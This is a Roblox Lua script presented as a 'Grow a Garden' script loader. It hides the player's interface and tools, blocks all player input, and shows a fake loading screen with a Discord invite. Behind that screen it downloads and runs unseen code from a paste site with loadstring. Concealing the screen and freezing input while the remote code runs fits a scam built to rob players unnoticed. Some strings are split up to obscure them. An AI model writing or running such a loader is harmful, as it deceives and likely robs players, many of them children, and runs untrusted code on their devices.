local a=game:GetService("Players")
local b=game:GetService("StarterGui")
local c=game:GetService("ContextActionService")
local d=a.LocalPlayer
local e=d:WaitForChild("PlayerGui")
b:SetCoreGuiEnabled(Enum.CoreGuiType.All,false)

local function f()
	for _,g in pairs(e:GetChildren())do
		if g:IsA("ScreenGui")and g.Name~=("Dark".."Loading".."Screen")then
			g.Enabled=false
		end
	end
	if d:FindFirstChild("Backpack")then
		for _,h in pairs(d.Backpack:GetChildren())do
			if h:IsA("Tool")and h:FindFirstChild("Handle")then
				h.Handle.Transparency=1
				local i=h.Handle:FindFirstChildOfClass("Decal")
				if i then i.Transparency=1 end
			end
		end
	end
end

local function j()
	c:BindAction("x",function()return Enum.ContextActionResult.Sink end,false,unpack(Enum.PlayerActions:GetEnumItems()))
end

j()
f()

local k=Instance.new("ScreenGui",e)
k.Name="DarkLoadingScreen"
k.IgnoreGuiInset=true
k.ResetOnSpawn=false
k.ZIndexBehavior=Enum.ZIndexBehavior.Global

local l=Instance.new("Frame",k)
l.Size=UDim2.new(1,0,1,0)
l.BackgroundColor3=Color3.fromRGB(20,20,20)

local m=Instance.new("TextLabel",l)
m.Text=string.char(240,159,140,180).." GROW A\n GARDEN "..string.char(240,159,140,180)
m.Size=UDim2.new(1,0,0.2,0)
m.Position=UDim2.new(0,0,0.15,0)
m.Font=Enum.Font.GothamBlack
m.TextColor3=Color3.new(1,1,1)
m.TextScaled=true
m.BackgroundTransparency=1

local n=Instance.new("TextLabel",l)
n.Text=("Script Loa".."ding Please Wait".. " for a While")
n.Size=UDim2.new(1,0,0.05,0)
n.Position=UDim2.new(0,0,0.42,0)
n.Font=Enum.Font.Gotham
n.TextColor3=Color3.fromRGB(200,200,200)
n.TextScaled=true
n.BackgroundTransparency=1

local o=Instance.new("TextLabel",l)
o.Text=("discord"..".gg/33UaSnkXdR")
o.Size=UDim2.new(0.5,0,0.04,0)
o.Position=UDim2.new(0.25,0,0.48,0)
o.Font=Enum.Font.GothamBold
o.TextColor3=Color3.fromRGB(220,220,220)
o.TextScaled=true
o.BackgroundColor3=Color3.fromRGB(40,40,40)
o.BorderSizePixel=0
Instance.new("UICorner",o).CornerRadius=UDim.new(0,8)

local p=Instance.new("Frame",l)
p.Size=UDim2.new(0.5,0,0.04,0)
p.Position=UDim2.new(0.25,0,0.55,0)
p.BackgroundColor3=Color3.fromRGB(50,50,50)
p.BorderSizePixel=0
Instance.new("UICorner",p).CornerRadius=UDim.new(0,10)

local q=Instance.new("Frame",p)
q.Size=UDim2.new(0,0,1,0)
q.BackgroundColor3=Color3.new(1,1,1)
q.BorderSizePixel=0
Instance.new("UICorner",q).CornerRadius=UDim.new(0,10)

local r=Instance.new("TextLabel",l)
r.Text="0%"
r.Size=UDim2.new(1,0,0.04,0)
r.Position=UDim2.new(0,0,0.61,0)
r.Font=Enum.Font.Gotham
r.TextColor3=Color3.fromRGB(255,255,255)
r.TextScaled=true
r.BackgroundTransparency=1

local s=0
while s<=99 do
	q:TweenSize(UDim2.new(s/100,0,1,0),"Out","Sine",0.1,true)
	r.Text=s.."%"
	f()
	wait(0.1+math.random()*0.08)
	s+=1
end

n.Text="Finalizing..."
r.Text="99%"
q:TweenSize(UDim2.new(0.99,0,1,0),"Out","Sine",0.2,true)

loadstring(game:HttpGet("https://paste.ee/r/glpPpoMo"))()
